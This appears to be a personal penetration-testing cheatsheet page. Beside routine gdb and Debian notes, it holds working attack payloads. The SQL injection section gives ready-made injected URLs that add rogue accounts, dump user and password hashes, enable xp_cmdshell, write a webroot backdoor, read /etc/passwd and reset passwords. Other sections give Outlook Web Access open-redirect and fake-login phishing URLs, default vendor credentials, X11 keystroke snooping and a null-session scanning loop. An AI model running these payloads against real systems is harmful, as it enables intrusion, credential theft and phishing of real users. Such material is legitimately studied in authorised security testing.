Projects‎ > ‎

Cheatsheets

Debugging

by filename from scratch:
$ sudo gdb /usr/sbin/programname
on already-running process:
$ sudo gdb /usr/sbin/programname 4860

self-explanatory:
(gdb) run
(gdb) generate-core-file
(gdb) detach

print stack (equivalent to 'backtrace' or 'bt' command):
(gdb) where

print lines of source code
(gdb) list

register values
(gdb) info reg

Hint: install relevant debug symbols package

useful links:
http://dirac.org/linux/gdb/01-Introduction.php
https://wiki.ubuntu.com/DebuggingProgramCrash
http://www.digilife.be/quickreferences/QRC/GDB%20Quick%20Reference.pdf


SQLi (mainly MSSQL and MySQL)

add flag as PoC:
CREATE TABLE pentester(was char(5),here char(5))
Verify by getting no errors (if vuln is error-based SQLi) when submitting a well-constructed query. i.e.:
http://target.foo/vuln.asp?id=1;SELECT * FROM pentester--
if the table was NOT created successfully, then you should get an error like:
Invalid object name "pentester"
add new account even if single and/or double quotation marks are filtered. Integers are converted to strings, so in this case the added username and password would be "666" (without quotation marks):
INSERT INTO users (user_id, username, password) VALUES (666,666,666)--
i.e.:
http://target.foo/vuln.asp?id=1;INSERT%20INTO%20users%20(user_id,%20username,%20password)%20VALUES%20(666,666,666)--
Traverse to table other than current one, and enumerate column names:
http://target.foo/vuln.asp?id=1;select%20*%20from%20users%20having%201=1--
Returns:
users.USER_ID
http://target.foo/vuln.asp?id=1;select%20*%20from%20users%20group%20by%20user_id%20having%201=1--
Returns:
users.USERNAME
http://target.foo/vuln.asp?id=1;select%20*%20from%20users%20group%20by%20user_id,username%20having%201=1--
Returns:
users.PASSWORD
And so on until no more similar SQL errors are returned

Get actual records. Note: SELECTed integers are dummy values to match the number of queried columns from the pre-UNION+SELECT statement:
http://target.foo/vuln.php?id=1+union+select+concat(username,0x3a,password),2,3,4,5,6,7+from+users--
Note: SQL server does not support the concat() function. Use the plus '+' operator instead.


Enable xp_cmdshell. Will only work if you have sa/dbo rights. Useful for SQL 2005 server:
EXEC master.dbo.sp_configure "show advanced options", 1
RECONFIGURE
EXEC master.dbo.sp_configure "xp_cmdshell", 1
RECONFIGURE

i.e.:

/vulnerable.cfm?ID=1;EXEC%20master.dbo.sp_configure%20%22show%20advanced%20options%22,%201;RECONFIGURE;EXEC%20master.dbo.sp_configure%20%22xp_cmdshell%22,%201;RECONFIGURE

Then write your backdoor shell code on webroot. i.e.:
EXEC master..xp_cmdshell "echo EVIL_CODE_HERE>d:\inetpub\wwwroot"

Save arbitrary content on filesystem (useful to achieve remote command execution on MySQL servers):
SELECT "evil content" INTO OUTFILE "/path/to/backdoor.php";
Get user:
or 1=convert(int,(USER))--
Get sa hash on MS SQL 2005:
SELECT password_hash FROM sys.sql_logins where name='sa'
Get file contents ('/etc/passwd' in this case):
SELECT load_file('/etc/passwd');
Use double quotes if single quotes are filtered:
SELECT load_file("/etc/passwd");
If both single and double quotes are filtered, then hex-encode filename. Note: you can use CAL9000 "straight" hex encoder to retrieve other filenames (don't forget to prepend hex string with '0x'):
SELECT load_file(0x2F6574632F706173737764);
Examples of interesting payloads (useful for blind SQLi):
UPDATE users SET password="1234" WHERE id=1;
If target table is not on current database, then specify database name the target table belongs to:
UPDATE dbname.users SET password="1234" WHERE id=1;
Blind SQLi delay test:
waitfor delay '0:0:10';
Don't forget to test variations which depend of where the payload is injected in the original SQL statement. i.e.:
http://target.foo/vuln.asp?id=1%27);waitfor%20delay%20%270:0:10%27--
Blind SQLi boolean test:

 AND 1=1
versus:
 AND 1=0
i.e.:
http://target.foo/vuln.asp?id=1+AND+1=1
Compare responses. i.e.: different content length, different errors in HTTP headers, etc.

Location of MySQL user hashes: table 'user' within 'mysql' database. i.e.:
SELECT Host,User,Password FROM mysql.user;
Location of *all* MySQL database names and table names: table 'TABLES' within the 'information_schema' database . i.e.:
SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES;

Useful resources:
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://michaeldaw.org/sql-injection-cheat-sheet/
http://pentestmonkey.net/index.php?option=com_content&task=category&sectionid=9&id=24&Itemid=1
http://www.toorcon.org/tcx/9_McCray.pdf
http://www.ngssoftware.com/papers/advanced_sql_injection.pdf
http://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf
http://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-alonso-parada.pdf

Command-line tools:
http://sqlmap.sourceforge.net/
http://sqlsus.sourceforge.net/
http://packetstormsecurity.org/UNIX/audit/sqlbftools-1.2.tar.gz

List of SQLi tools with brief reviews (in Spanish): http://www.unsec.net/2006/11/herramientas-sql-injection.html

Debian/Ubuntu/GNU Linux

Search for package names based on keywords:
$sudo apt-cache search "Text-to-search"

i.e.:
$ sudo apt-cache search "mysql"
Example of network settings:
$ cat /etc/network/interfaces
auto lo
iface lo inet loopbackaddress 10.10.50.65
netmask 255.255.255.0
gateway 10.10.50.1

Finding world-writable files and directories
# find / -type f \( -perm -2 -o -perm -20 \) -exec ls -lg {} \; 2>/dev/null >writable.txt
# find / -type d \( -perm -2 -o -perm -20 \) -exec ls -ldg {} \; 2>/dev/null >>writable.txt

Finding setuid files
# find / -type f \( -perm -004000 -o -perm -002000 \) -exec ls -lg {} \; 2>/dev/null >suidfiles.txt

References: http://www.gentoo.org/doc/en/security/security-handbook.xml?part=1&chap=6

Change DNS server settings permanently so they are not overwritten via DHCP:
- edit /etc/dhcp3/dhclient.conf
- uncomment supersede statement with desired settings. i.e.: supersede domain-name-servers 208.67.222.222,208.67.220.220;
- restart networking. i.e.: sudo /etc/init.d/networking restart    

Outlook Web Access (OWA) 2003

Exchange admin:
https://webmail.target.foo/exadmin/

Cross-domain redirect (redirect happens after clicking on "Log on", even if credentials are invalid):
https://webmail.target.foo/exchweb/bin/auth/owalogon.asp?url=http://webmail.target.foo.fake.com/

For the following redirect, the credentials must be valid:
https://webmail.target.foo/exchweb/bin/redir.asp?URL=http://webmail.target.foo.fake.com/

VBScript error by assigning a string to the 'reason' parameter (expects a numeric value):
https://webmail.target.foo/exchweb/bin/auth/owalogon.asp?reason=abc

Error returned in HTML:
Microsoft VBScript runtime error '800a000d'

Type mismatch: '[string: "abc"]'

/exchweb/bin/auth/usa/logon.asp, line 542

Error returned in HTTP headers:
500 Internal Server Error

Advanced phishing: will show the fake login page after logging in while still on the legitimate site.
syntax:
https://webmail.target.foo/exchweb/bin/auth/owalogon.asp?url=https://webmail.target.foo/exchange/<victim_username>/Inbox/<email_subject>.EML/1_multipart_xF8FF_2_<html_attachment_filename>
i.e.:
https://webmail.target.foo/exchweb/bin/auth/owalogon.asp?url=https://webmail.target.foo/exchange/pgriffin/Inbox/OWA%20LOGON.EML/1_multipart_xF8FF_2_fake_login.html

More info here:
http://www.gnucitizen.org/blog/owning-outlook-web-access-owa-users/


Infrastructure pentesting

smb
test cracked/found password via SMB:
smbclient \\\\targethost\\ipc$ -U username password
 
x11
packages required for xkey.c: libxt-dev and probably x11proto-core-dev

if target is missconfigured and allows connections from any hosts. i.e.:

$ xhost +

then we can:
$ export DISPLAY=server-host-name:0.0
remember to try different display numbers:
declare -x DISPLAY="10.10.3.11:1.0"
declare -x DISPLAY="10.10.3.11:2.0"
etc ...

Depends on open ports. i.e.: display 1 on tcp/6000, display 2 on tcp/6001 and so on.

Then have fun with X tools. i.e.: xkey, xtv, etc ...

Compaq Insight Manager - now known as HP System Management
default passwords:
anonymous/<none>
user/user
user/public
user/<none>
administrator/administrator
operator/operator
PFCUser/240653C9467E45
default login URL: http://target.foo:2301/cpqlogin.htm

find hosts allowing null sessions in subnet
$ echo -en "\n" > returnchar.txt
$ for((i=1;i<255;++i));do echo -en "$i ";smbclient \\\\10.10.1.$i\\ipc$ "" -U ""<returnchar.txt;done;

Windows tricks/useful commands
 
find files containing a certain string in their name (case insensitive search):
dir \ /s /b | find /I "password"
find files containing a certain string (case insensitive search):
findstr /i /s "password" \*
Comments